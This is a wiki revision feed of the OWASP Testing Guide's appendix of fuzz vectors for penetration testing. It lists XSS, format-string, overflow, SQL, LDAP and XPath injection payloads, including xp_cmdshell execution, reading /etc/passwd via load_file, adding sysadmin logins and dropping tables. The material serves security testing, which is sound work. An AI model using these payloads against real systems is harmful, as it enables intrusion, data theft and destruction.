&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;amp;amp;#106;&amp;amp;amp;#97;&amp;amp;amp;#118;&amp;amp;amp;#97;&amp;amp;amp;&amp;lt;WBR&amp;gt;#115;&amp;amp;amp;#99;&amp;amp;amp;#114;&amp;amp;amp;#105;&amp;amp;amp;#112;&amp;amp;amp;&amp;lt;WBR&amp;gt;#116;&amp;amp;amp;#58;&amp;amp;amp;#97;&amp;amp;amp;#108;&amp;amp;amp;#101;&amp;amp;amp;&amp;lt;WBR&amp;gt;#114;&amp;amp;amp;#116;&amp;amp;amp;#40;&amp;amp;amp;#39;&amp;amp;amp;#88;&amp;amp;amp;#83&amp;lt;WBR&amp;gt;;&amp;amp;amp;#83;&amp;amp;amp;#39;&amp;amp;amp;#41&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG&lt;br /&gt;
SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;&amp;lt;WBR&amp;gt;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;&amp;lt;WBR&amp;gt;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;&amp;lt;WBR&amp;gt;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;&amp;lt;WBR&amp;gt;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;&amp;lt;WBR&amp;gt;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;&amp;lt;WBR&amp;gt;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;&amp;lt;WBR&amp;gt;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;&amp;lt;WBR&amp;gt;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;&amp;lt;WBR&amp;gt;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;&amp;lt;WBR&amp;gt;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x09;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0A;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0D;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Buffer Overflows (BFO) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here. &lt;br /&gt;
&lt;br /&gt;
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 5&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 17&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 33&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 65&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 129&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 257&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 513&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 1024&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 2049&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 4097&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 8193&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 12288&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Format String Errors (FSE) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
%s%p%x%d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
.1024d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
%.2049d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%p%p%p%p&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%x%x%x%x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%d%d%d%d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s%s%s%s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%99999999999s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%08x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20n&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s%s%s%s%s%s%s%s%s%s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%p%p%p%p%p%p%p%p%p%p&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s x 129&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%x x 257&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Integer Overflows (INT) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;-1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x100&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x1000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x3fffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x7ffffffe&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x7fffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x80000000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0xfffffffe&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0xffffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x10000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x100000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Passive SQL Injection (SQP) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;OR 1=1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR '1'='1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;; OR '1'='1'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+--+&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot; or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1=1 /*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 'a'='a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot; or &amp;quot;a&amp;quot;=&amp;quot;a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;') or ('a'='a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;Admin' OR '&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' group by userid having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1 in (select @@version)--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union all select @@version--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'unusual' = 'unusual'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'something' = 'some'+'thing'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'text' = N'text'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'something' like 'some%'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 2 &amp;gt; 1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'text' &amp;gt; 't'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'whatever' in ('whatever')&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 2 BETWEEN 1 and 3&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or username like char(37);&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select * from users where login = char(114,111,111,116);&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select &lt;br /&gt;
&amp;lt;nowiki&amp;gt;Password:*/=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;UNI/**/ON SEL/**/ECT&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'/**/OR/**/1/**/=/**/1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1/*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+--+&amp;amp;password=&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &amp;gt; @var select @var as var into temp end --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' and 1 in (select var from temp)--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select 1,load_file('/etc/passwd'),1,1,1;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' and 1=( if((load_file(char(110,46,101,120,116))&amp;lt;&amp;gt;char(39,39)),1,0));&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Active SQL Injection (SQI) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY 'pass123'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' ; drop table temp --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;exec sp_addlogin 'name' , 'password'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== LDAP Injection ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;*()|%26'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;admin*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;admin*)((|userPassword=*)&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;*)(uid=*))(|(uid=*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XPATH Injection ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'+or+'1'='1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=13693</id>
		<title>OWASP Testing Guide Appendix C: Fuzz Vectors</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=13693"/>
				<updated>2006-11-26T11:40:30Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: Added LDAP and XPATH fuzz vectors&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following are fuzzing vectors which can be used with webscarab, jbrofuzz or another fuzzer.&lt;br /&gt;
Fuzzing is the &amp;quot;kitchen sink&amp;quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.&lt;br /&gt;
This is the simple part of the discovery phase.&lt;br /&gt;
Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.&lt;br /&gt;
&lt;br /&gt;
=== Fuzz Categories ===&lt;br /&gt;
&lt;br /&gt;
In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:&lt;br /&gt;
&lt;br /&gt;
* Recursive fuzzing&lt;br /&gt;
* Replasive fuzzing&lt;br /&gt;
&lt;br /&gt;
We examine and define each category in the sub-sections that follow. &lt;br /&gt;
&lt;br /&gt;
==== Recursive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Selecting &amp;quot;8302fa3b&amp;quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/00000000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/11000fff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/ffffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Replasive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Replasive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This is a form of replasive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. &lt;br /&gt;
&lt;br /&gt;
The remainder of this appendix presents a number of fuzz vector categories.&lt;br /&gt;
&lt;br /&gt;
=== Cross Site Scripting (XSS) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;STYLE&amp;gt;@import&amp;quot;javascript:alert('XSS')&amp;quot;;&amp;lt;/STYLE&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;'&amp;gt;&amp;lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;%22%27&amp;gt;&amp;lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt; &amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;amp;quot;XSS&amp;lt;WBR&amp;gt;&amp;amp;amp;quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;amp;amp;#106;&amp;amp;amp;#97;&amp;amp;amp;#118;&amp;amp;amp;#97;&amp;amp;amp;&amp;lt;WBR&amp;gt;#115;&amp;amp;amp;#99;&amp;amp;amp;#114;&amp;amp;amp;#105;&amp;amp;amp;#112;&amp;amp;amp;&amp;lt;WBR&amp;gt;#116;&amp;amp;amp;#58;&amp;amp;amp;#97;&amp;amp;amp;#108;&amp;amp;amp;#101;&amp;amp;amp;&amp;lt;WBR&amp;gt;#114;&amp;amp;amp;#116;&amp;amp;amp;#40;&amp;amp;amp;#39;&amp;amp;amp;#88;&amp;amp;amp;#83&amp;lt;WBR&amp;gt;;&amp;amp;amp;#83;&amp;amp;amp;#39;&amp;amp;amp;#41&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG&lt;br /&gt;
